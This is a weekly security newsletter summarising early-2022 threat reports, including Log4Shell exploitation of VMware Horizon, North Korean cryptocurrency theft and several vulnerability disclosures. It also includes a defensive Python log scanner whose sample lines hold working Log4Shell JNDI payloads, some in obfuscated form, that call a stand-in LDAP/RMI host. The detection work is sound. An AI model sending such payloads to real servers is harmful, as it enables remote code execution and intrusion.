
Security News of Interest This Week - Issue #49

Weekly newsletter of Masafumi Negishi
Incidents and accidents
Ukrainian government websites defaced
Attacks and threats
Cloudflare publishes its DDoS attack report for Q4 2021
Microsoft reports on a China-based threat actor exploiting the Log4Shell vulnerability (CVE-2021-44228) in VMware Horizon
As early as January 4, attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon. Our investigation shows that successful intrusions in these campaigns led to the deployment of the NightSky ransomware.
These attacks are performed by a China-based ransomware operator that we’re tracking as DEV-0401. DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo, and Rook, and has similarly exploited Internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).
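Internet-facing Horizon instances were hit through Log4Shell, which is triggered by a `${jndi:...}` lookup in any string the application logs (a User-Agent header is the classic carrier). The detector below is an added example written for this newsletter, not code from Microsoft or from the original page: it normalizes web-server log lines (URL-decoding and collapsing the `${lower:j}`, `${::-j}` and `${date:'j'}` nesting tricks attackers used to evade naive `jndi` greps) and then reports the JNDI scheme found. The log lines are constructed for the example and the IP addresses are documentation ranges, not real indicators.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from any real incident). Lines 1-4 carry
# a Log4Shell lookup in increasingly obfuscated forms; line 0 is benign.
SAMPLE_LOGS = [
    '10.0.0.5 - - [04/Jan/2022:10:12:01 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [04/Jan/2022:10:12:03 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [04/Jan/2022:10:12:04 +0000] "GET /x HTTP/1.1" 404 0 "-" "${${lower:j}${lower:n}di:${lower:r}mi://203.0.113.7/x}"',
    '10.0.0.9 - - [04/Jan/2022:10:12:05 +0000] "GET /y?q=%24%7Bjndi%3Adns%3A%2F%2Fexample.test%2Fz%7D HTTP/1.1" 200 1 "-" "curl/7.79"',
    '10.0.0.9 - - [04/Jan/2022:10:12:06 +0000] "GET /z HTTP/1.1" 200 1 "-" "${${::-j}${::-n}${::-d}${::-i}:${date:\'l\'}dap://203.0.113.7/o}"',
    '10.0.0.7 - - [04/Jan/2022:10:12:07 +0000] "GET /env HTTP/1.1" 200 1 "-" "${env:HOME}"',
]

# Innermost ${...} that contains no further braces.
INNER = re.compile(r"\$\{([^{}]*)\}")
# A resolved JNDI lookup: ${jndi:<scheme>:...}
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def _resolve_inner(m: re.Match) -> str:
    """Evaluate one innermost lookup the way Log4j 2 would, for the obfuscation-relevant cases."""
    body = m.group(1)
    key, sep, val = body.partition(":")
    k = key.strip().lower()
    if k == "jndi":
        return m.group(0)                      # leave the payload intact for the outer match
    if ":-" in body:                           # ${anything:-X}: undefined lookup, default X
        return body.split(":-", 1)[1]
    if k == "lower" and sep:
        return val.lower()
    if k == "upper" and sep:
        return val.upper()
    if k == "date" and sep:                    # ${date:'j'}: quoted literal passes through
        return val.strip("'\"")
    return m.group(0)                          # unknown lookup without default: unchanged


def normalize(line: str, max_rounds: int = 10) -> str:
    """URL-decode (twice, for double encoding) and collapse nested lookups until stable."""
    s = unquote(unquote(line))
    for _ in range(max_rounds):
        new = INNER.sub(_resolve_inner, s)
        if new == s:
            break
        s = new
    return s


def find_jndi(line: str):
    """Return the JNDI scheme (ldap, rmi, dns, ...) if the line carries a lookup, else None."""
    m = JNDI.search(normalize(line))
    return m.group(1).lower() if m else None


def scan(lines):
    """Return (line_index, scheme) for every line that carries a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        scheme = find_jndi(line)
        if scheme:
            hits.append((i, scheme))
    return hits


if __name__ == "__main__":
    for idx, scheme in scan(SAMPLE_LOGS):
        print(f"line {idx}: JNDI lookup via {scheme}")
```

Run it against a real access log by replacing `SAMPLE_LOGS` with the file's lines; a hit is a probe at minimum, and on an unpatched Horizon instance it is evidence of exploitation, so correlate the scheme and callback host with outbound LDAP/RMI/DNS traffic from the server.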
CISA, FBI, and NSA issue a joint advisory on Russian attacks against US critical infrastructure
U.S. Cyber Command discloses details of malware used by the Iranian threat group MuddyWater
Chainalysis reports on North Korean threat groups' cryptocurrency-theft activity in 2021
North Korean cybercriminals had a banner year in 2021, launching at least seven attacks on cryptocurrency platforms that extracted nearly $400 million worth of digital assets last year. These attacks targeted primarily investment firms and centralized exchanges, and made use of phishing lures, code exploits, malware, and advanced social engineering to siphon funds out of these organizations’ internet-connected “hot” wallets into DPRK-controlled addresses. Once North Korea gained custody of the funds, they began a careful laundering process to cover up and cash out.
Kaspersky Lab reports on cryptocurrency-targeting attacks by the North Korean threat group BlueNoroff
BlueNoroff is the name of an APT group coined by Kaspersky researchers while investigating the notorious attack on Bangladesh’s Central Bank back in 2016. A mysterious group with links to Lazarus and an unusual financial motivation for an APT. The group seems to work more like a unit within a larger formation of Lazarus attackers, with the ability to tap into its vast resources: be it malware implants, exploits, or infrastructure. See our earlier publication about BlueNoroff attacks on the banking sector.
Also, we have previously reported on cryptocurrency-focused BlueNoroff attacks. It appears that BlueNoroff shifted focus from hitting banks and SWIFT-connected servers to solely cryptocurrency businesses as the main source of the group’s illegal income. These attackers even took the long route of building fake cryptocurrency software development companies in order to trick their victims into installing legitimate-looking applications that eventually receive backdoored updates. We reported about the first variant of such software back in 2018, but there were many other samples to be found, which was later reported by the US CISA (Cybersecurity and Infrastructure Security Agency) in 2021.
The group is currently active (recent activity was spotted in November 2021).
JPCERT/CC publishes "FAQ to read if you have been hit by an intrusion-type ransomware attack" (侵入型ランサムウェア攻撃を受けたら読むFAQ)
Attacks using ransomware range from infections of one to a few endpoints to large-scale infections that bring business operations to a halt. This FAQ sets out, in question-and-answer form, the key points and considerations for responding when a company or organization has suffered an attack in which an adversary "intrudes" into its internal network and then carries out information theft, encryption of files with ransomware, and similar actions.
JPCERT/CC distinguishes such attacks from other ransomware attacks and calls them "intrusion-type ransomware attacks" (侵入型ランサムウェア攻撃).
Emsisoft publishes its ransomware report for Q4 2021
Vulnerabilities
CISA adds 15 new vulnerabilities to its Known Exploited Vulnerabilities Catalog
CISA has added 15 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.
Vulnerability that bypasses TCC (Transparency, Consent, and Control), a macOS protection feature
Remote code execution vulnerability (CVE-2021-45608) in KCodes NetUSB, which is used in many network devices
Rapid7 publishes details of vulnerabilities in the SonicWall SMA 100 series
Over the course of routine security research, Rapid7 researcher Jake Baines discovered and reported five vulnerabilities involving the SonicWall Secure Mobile Access (SMA) 100 series of devices, which includes SMA 200, 210, 400, 410, and 500v. The most serious of these issues can lead to unauthenticated remote code execution (RCE) on affected devices. We reported these issues to SonicWall, who published software updates and have released fixes to customers and channel partners on December 7, 2021. Rapid7 urges users of the SonicWall SMA 100 series to apply these updates as soon as possible. The table below summarizes the issues found.
Other

Security Researcher, IIJ-SECT, SANS Instructor in Japan, OWASP Japan Advisory Board, WASForum Hardening Project. I want to see a safe online society that children can use with peace of mind.
